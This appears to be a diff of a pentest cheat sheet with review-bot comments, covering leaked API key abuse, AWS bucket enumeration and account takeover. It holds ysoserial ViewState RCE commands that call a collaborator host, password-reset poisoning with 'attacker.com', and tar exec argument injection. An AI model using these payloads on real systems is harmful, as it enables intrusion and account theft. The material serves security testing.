| Streetview | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE |
| Embed | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE |
| Directions | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE |
| Geocoding | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE |
| Distance Matrix | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE |
| Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE |
| Autocomplete | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE |
| Elevation | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE |
| Timezone | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY_HERE |
| Roads | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE |
| Geolocate | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE |
Impact:
* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
### Algolia
```powershell
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
```
### Slack API Token
```powershell
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
```
### Facebook Access Token
```powershell
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
```
### Github client id and client secret
```powershell
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
```
### Twilio Account_sid and Auth token
```powershell
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
```
### Twitter API Secret
```powershell
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
```
### Twitter Bearer Token
```powershell
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
```
### Gitlab Personal Access Token
```powershell
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
```
### HockeyApp API Token
```powershell
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
```
### IIS Machine Keys
> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Requirements
* machineKey **validationKey** and **decryptionKey**
* __VIEWSTATEGENERATOR cookies
* __VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
```xml
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
```
Common locations of **web.config** / **machine.config**
* 32-bit
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
* 64-bit
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
* in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
* HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
* HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
#### Identify known machine key
* Exploit with [Blacklist3r/AspDotNetWrapper](https://github.com/NotSoSecure/Blacklist3r)
* Exploit with [ViewGen](https://github.com/0xacb/viewgen)
```powershell
# --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file
# -m MODIFIER, --modifier MODIFIER: VIEWSTATEGENERATOR value
$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
[+] ViewState is not encrypted
[+] Signature algorithm: SHA1
# --encrypteddata : __VIEWSTATE parameter value of the target application
# --modifier : __VIEWSTATEGENERATOR parameter value
$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> macdecode
```
#### Decode ViewState
```powershell
$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
```
#### Generate ViewState for RCE
**NOTE**: Send a POST request with the generated ViewState to the same endpoint, in Burp you should **URL Encode Key Characters** for your payload.
```powershell
$ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
$ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
```
#### Edit cookies with the machine key
If you have the machineKey but the viewstate is disabled.
ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
```powershell
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
```
### Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
```
#Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropriate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"
```
## References
* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
* [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/)
* [Mapbox API Token Documentation](https://docs.mapbox.com/help/troubleshooting/how-to-use-mapbox-securely/)
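Review bot: the Summary entry `[Mapbox API Token](#Mapbox-API-Token)` will not resolve, because generated heading anchors are lowercased (`#mapbox-api-token`), while every other entry in that list is already lowercase. Two smaller points: the HockeyApp `curl` example embeds what look like a real token and app id (`X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c`, `/apps/2021bdf2671ab09174c1de5ad147ea2ba4`) where the other sections use `TOKEN_HERE`-style placeholders, so it should use placeholders as well; and the Mapbox block is an untagged fence while the rest of the file tags its blocks (`powershell`/`ps1`), so tag it for consistent rendering. Typo in the badsecrets description: `on across many platforms`.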

View File

@@ -2,46 +2,16 @@
## Summary ## Summary
- [Tools](#tools)
- [AWS Configuration](#aws-configuration) - [AWS Configuration](#aws-configuration)
- [Open Bucket](#open-bucket) - [Open Bucket](#open-bucket)
- [Basic tests](#basic-tests) - [Basic tests](#basic-tests)
- [Listing files](#listing-files) - [Listing files](#listing-files)
- [Move a file into the bucket](move-a-file-into-the-bucket) - [Move a file into the bucket](#move-a-file-into-the-bucket)
- [Download every things](#download-every-things) - [Download every things](#download-every-things)
- [Check bucket disk size](#check-bucket-disk-size) - [Check bucket disk size](#check-bucket-disk-size)
- [AWS - Extract Backup](#aws---extract-backup) - [AWS - Extract Backup](#aws---extract-backup)
- [Bucket juicy data](#bucket-juicy-data) - [Bucket juicy data](#bucket-juicy-data)
## Tools
- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
- [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/)
```powershell
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words
US Standard = http://s3.amazonaws.com
Ireland = http://s3-eu-west-1.amazonaws.com
Northern California = http://s3-us-west-1.amazonaws.com
Singapore = http://s3-ap-southeast-1.amazonaws.com
Tokyo = http://s3-ap-northeast-1.amazonaws.com
./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words
```
- [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
```python
import boto3
# Create an S3 client
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
try:
result = s3.list_buckets()
print(result)
except Exception as e:
print(e)
```
## AWS Configuration ## AWS Configuration
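Review bot: the `(move-a-file-into-the-bucket)` Summary link was missing its `#` and is fixed on the right-hand side, good. The rest of the hunk removes the whole `## Tools` section (Pacu, Bucket Finder, the boto3 snippet) together with its `- [Tools](#tools)` Summary entry; the side-by-side rendering shows those lines only once, so the commit message should say where the tools moved. Note that the removed boto3 snippet carried partially redacted key material (`AKIAJQDP3RKREDACTED`, `igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED`); if the snippet is relocated, replace those with obvious placeholders rather than carrying the strings over.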
@@ -82,6 +52,7 @@ By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_na
http://s3.amazonaws.com/[bucket_name]/ http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/ http://[bucket_name].s3.amazonaws.com/
http://flaws.cloud.s3.amazonaws.com/ http://flaws.cloud.s3.amazonaws.com/
https://buckets.grayhatwarfare.com/
``` ```
Their names are also listed if the listing is enabled. Their names are also listed if the listing is enabled.
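Review bot: `https://buckets.grayhatwarfare.com/` is added inside the fenced block that lists S3 URL patterns (`http://s3.amazonaws.com/[bucket_name]/`, `http://[bucket_name].s3.amazonaws.com/`), but it is not a bucket URL pattern; it is a third-party search index. Move it to a Tools or References entry with a one-line description so readers do not mistake it for an S3 endpoint form.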
@@ -105,7 +76,7 @@ eg: http://redacted/avatar/123%C0
```bash ```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
``` ```
You can get the region with a dig and nslookup You can get the region with a dig and nslookup
@@ -152,22 +123,24 @@ aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWr
## AWS - Extract Backup ## AWS - Extract Backup
```powershell ```powershell
aws --profile flaws sts get-caller-identity $ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029", "Account": "XXXX26262029",
aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89", "SnapshotId": "snap-XXXX342abd1bdcb89",
Create a volume using snapshot Create a volume using snapshot
aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89 $ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
In Aws Console -> EC2 -> New Ubuntu In Aws Console -> EC2 -> New Ubuntu
chmod 400 YOUR_KEY.pem $ chmod 400 YOUR_KEY.pem
ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com $ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
Mount the volume Mount the volume
lsblk $ lsblk
sudo file -s /dev/xvda1 $ sudo file -s /dev/xvda1
sudo mount /dev/xvda1 /mnt $ sudo mount /dev/xvda1 /mnt
``` ```
## Bucket juicy data ## Bucket juicy data
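Review bot: the volume is created in `us-west-2a` (`create-volume --availability-zone us-west-2a --region us-west-2`) but the SSH target is a `us-east-2` instance (`ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com`); an EBS volume can only be attached to an instance in the same Availability Zone, so the walkthrough as written cannot reach the `lsblk`/`mount` step. Make the regions agree, and add the `attach-volume` step that is missing between creating the volume and running `lsblk`. Also, the newly added `$ ` prompts break copy-paste, the narrative lines (`Create a volume using snapshot`, `In Aws Console -> EC2 -> New Ubuntu`, `Mount the volume`) sit inside the code fence unmarked and should be `#` comments, and the fence is tagged `powershell` for what is a bash session using `sudo`.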
@@ -183,40 +156,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
## Enumerate IAM permissions
Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
```powershell
git clone git@github.com:andresriancho/enumerate-iam.git
cd enumerate-iam/
pip install -r requirements.txt
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
"RoleDetailList": [
{
"Tags": [],
"AssumeRolePolicyDocument": {
"Version": "2008-10-17",
"Statement": [
{
...
2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
```
## References ## References
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets) * [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) * [Bug Bounty Survey - AWS Basic test](https://web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136)
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) * [Guardzilla video camera hardcoded AWS credential ~~- 0dayallday.org~~ - blackmarble.sh](https://blackmarble.sh/guardzilla-video-camera-hard-coded-aws-credentials/)
* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) * [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
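Review bot: the updated `Bug Bounty Survey - AWS Basic test` reference changes the tweet id along with the host (`status/859389553211297792` becomes `web.archive.org/web/20180808181450/https://twitter.com/bugbsurveys/status/860102244171227136`); verify the archived status is the same tweet. The `Guardzilla` entry keeps strikethrough inside the link text (`~~- 0dayallday.org~~ - blackmarble.sh`), which renders as crossed-out text in the bullet; drop the old attribution instead of striking it through. The hunk also removes the `## Enumerate IAM permissions` section and its enumerate-iam sample log, the only place that tool was referenced; if the section moved elsewhere, the commit message should say where.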

275
Account Takeover/README.md Normal file
View File

@@ -0,0 +1,275 @@
# Account Takeover
## Summary
* [Password Reset Feature](#password-reset-feature)
* [Password Reset Token Leak Via Referrer](#password-reset-token-leak-via-referrer)
* [Account Takeover Through Password Reset Poisoning](#account-takeover-through-password-reset-poisoning)
* [Password Reset Via Email Parameter](#password-reset-via-email-parameter)
* [IDOR on API Parameters](#idor-on-api-parameters)
* [Weak Password Reset Token](#weak-password-reset-token)
* [Leaking Password Reset Token](#leaking-password-reset-token)
* [Password Reset Via Username Collision](#password-reset-via-username-collision)
* [Account takeover due to unicode normalization issue](#account-takeover-due-to-unicode-normalization-issue)
* [Account Takeover Via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
* [Account Takeover Via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
* [Account Takeover via CSRF](#account-takeover-via-csrf)
* [2FA Bypasses](#2fa-bypasses)
* [Response Manipulation](#reponse-manipulation)
* [Status Code Manipulation](#status-code-manipulation)
* [2FA Code Leakage in Response](#2fa-code-leakage-in-response)
* [JS File Analysis](#js-file-analysis)
* [2FA Code Reusability](#2fa-code-reusability)
* [Lack of Brute-Force Protection](#lack-of-brute-force-protection)
* [Missing 2FA Code Integrity Validation](#missing-2fa-code-integrity-validation)
* [CSRF on 2FA Disabling](#csrf-on-2fa-disabling)
* [Password Reset Disable 2FA](#password-reset-disable-2fa)
* [Backup Code Abuse](#backup-code-abuse)
* [Clickjacking on 2FA Disabling Page](#clickjacking-on-2fa-disabling-page)
* [Enabling 2FA doesn't expire Previously active Sessions](#enabling-2fa-doesnt-expire-previously-active-sessions)
* [Bypass 2FA by Force Browsing](#bypass-2fa-by-force-browsing)
* [Bypass 2FA with null or 000000](#bypass-2fa-with-null-or-000000)
* [Bypass 2FA with array](#bypass-2fa-with-array)
* [References](#references)
## Password Reset Feature
### Password Reset Token Leak Via Referrer
1. Request password reset to your email address
2. Click on the password reset link
3. Don't change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.
### Account Takeover Through Password Reset Poisoning
1. Intercept the password reset request in Burp Suite
2. Add or edit the following headers in Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header
```http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
```
4. Look for a password reset URL based on the *host header* like : `https://attacker.com/reset-password.php?token=TOKEN`
### Password Reset Via Email Parameter
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters
1. Attacker have to login with their account and go to the **Change password** feature.
2. Start the Burp Suite and Intercept the request
3. Send it to the repeater tab and edit the parameters : User ID/email
```powershell
POST /api/changepass
[...]
("form": {"email":"victim@email.com","password":"securepwd"})
```
### Weak Password Reset Token
The password reset token should be randomly generated and unique every time.
Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
* Timestamp
* UserID
* Email of User
* Firstname and Lastname
* Date of Birth
* Cryptography
* Number only
* Small token sequence (<6 characters between [A-Z,a-z,0-9])
* Token reuse
* Token expiration date
### Leaking Password Reset Token
1. Trigger a password reset request using the API/UI for a specific email e.g: test@mail.com
2. Inspect the server response and check for `resetToken`
3. Then use the token in an URL like `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset Via Username Collision
1. Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g: `"admin "`
2. Request a password reset with your malicious username.
3. Use the token sent to your email and reset the victim password.
4. Connect to the victim account with the new password.
The platform CTFd was vulnerable to this attack.
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account takeover due to unicode normalization issue
When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur.
- Victim account: `demo@gmail.com`
- Attacker account: `demⓞ@gmail.com`
[Unisub - is a tool that can suggest potential unicode characters that may be converted to a given character](https://github.com/tomnomnom/hacks/tree/master/unisub).
[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
## Account Takeover Via Cross Site Scripting
1. Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain : `*.domain.com`
2. Leak the current **sessions cookie**
3. Authenticate as the user using the cookie
## Account Takeover Via HTTP Request Smuggling
Refer to **HTTP Request Smuggling** vulnerability page.
1. Use **smuggler** to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```powershell
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```
2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
```powershell
GET http://something.burpcollaborator.net HTTP/1.1
X:
```
3. Final request could look like the following
```powershell
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone reports exploiting this bug
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
## Account Takeover via CSRF
1. Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
2. Send the payload
## Account Takeover via JWT
JSON Web Token might be used to authenticate an user.
* Edit the JWT with another User ID / Email
* Check for weak JWT signature
## 2FA Bypasses
### Response Manipulation
In response if `"success":false`
Change it to `"success":true`
### Status Code Manipulation
If Status Code is **4xx**
Try to change it to **200 OK** and see if it bypass restrictions
### 2FA Code Leakage in Response
Check the response of the 2FA Code Triggering Request to see if the code is leaked.
### JS File Analysis
Rare but some JS Files may contain info about the 2FA Code, worth giving a shot
### 2FA Code Reusability
Same code can be reused
### Lack of Brute-Force Protection
Possible to brute-force any length 2FA Code
### Missing 2FA Code Integrity Validation
Code for any user acc can be used to bypass the 2FA
### CSRF on 2FA Disabling
No CSRF Protection on disabling 2FA, also there is no auth confirmation
### Password Reset Disable 2FA
2FA gets disabled on password change/email change
### Backup Code Abuse
Bypassing 2FA by abusing the Backup code feature
Use the above mentioned techniques to bypass Backup Code to remove/reset 2FA restrictions
### Clickjacking on 2FA Disabling Page
Iframing the 2FA Disabling page and social engineering victim to disable the 2FA
### Enabling 2FA doesn't expire Previously active Sessions
If the session is already hijacked and there is a session timeout vuln
### Bypass 2FA by Force Browsing
If the application redirects to `/my-account` url upon login while 2Fa is disabled, try replacing `/2fa/verify` with `/my-account` while 2FA is enabled to bypass verification.
### Bypass 2FA with null or 000000
Enter the code **000000** or **null** to bypass 2FA protection.
### Bypass 2FA with array
```json
{
"otp":[
"1234",
"1111",
"1337", // GOOD OTP
"2222",
"3333",
"4444",
"5555"
]
}
```
## TODO
* Broken cryptography
* Session hijacking
* OAuth misconfiguration
## References
- [10 Password Reset Flaws - Anugrah SR](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
- [$6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained](https://www.youtube.com/watch?v=gzM4wWA7RFo&feature=youtu.be)
- [Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020](https://speakerdeck.com/harshbothra/broken-cryptography-and-account-takeovers?slide=28)
- [Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020](https://www.troyhunt.com/hacking-grindr-accounts-with-copy-and-paste/)
- [CTFd Account Takeover](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
- [2FA simple bypass](https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass)
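Review bot: the Summary entry `[Response Manipulation](#reponse-manipulation)` is misspelled and will not resolve to the `### Response Manipulation` heading (`#response-manipulation`). The `## Account Takeover via JWT` section has no Summary entry at all, and `## TODO` is an unfinished placeholder inside a published page. Minor: `unexcepted behavior` in the unicode normalisation paragraph should be `unexpected`, and the `http` block under password reset poisoning shows only `Host: attacker.com` while the step text lists both `Host: attacker.com` and `X-Forwarded-Host: attacker.com`, so the example request should include both headers it describes.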

View File

@@ -0,0 +1,100 @@
# Argument Injection
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
It can happen in different situations, where you can only inject arguments to a command:
- Improper sanitization (regex)
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
- Bash expansion (ex: *)
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:
```py
from shlex import quote,split
import sys
import subprocess
if __name__=="__main__":
command = ['curl']
command = command + split(sys.argv[1])
print(command)
r = subprocess.Popen(command)
```
It is possible for an attacker to pass several words to abuse options from ```curl``` command
```ps1
python python_rce.py "https://www.google.fr -o test.py"
```
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
```ps1
['curl', 'https://www.google.fr', '-o', 'test.py']
```
## Summary
* [List of exposed commands](#list-of-exposed-commands)
* [CURL](#CURL)
* [TAR](#TAR)
* [FIND](#FIND)
* [WGET](#WGET)
* [References](#references)
## List of exposed commands
### CURL
It is possible to abuse ```curl``` through the following options:
```ps1
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
```
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
### TAR
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
Argument injection can happen into the '''extract''' command:
```ps1
--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>
```
Or in the '''create''' command:
```ps1
-I=<program> or -I <program>
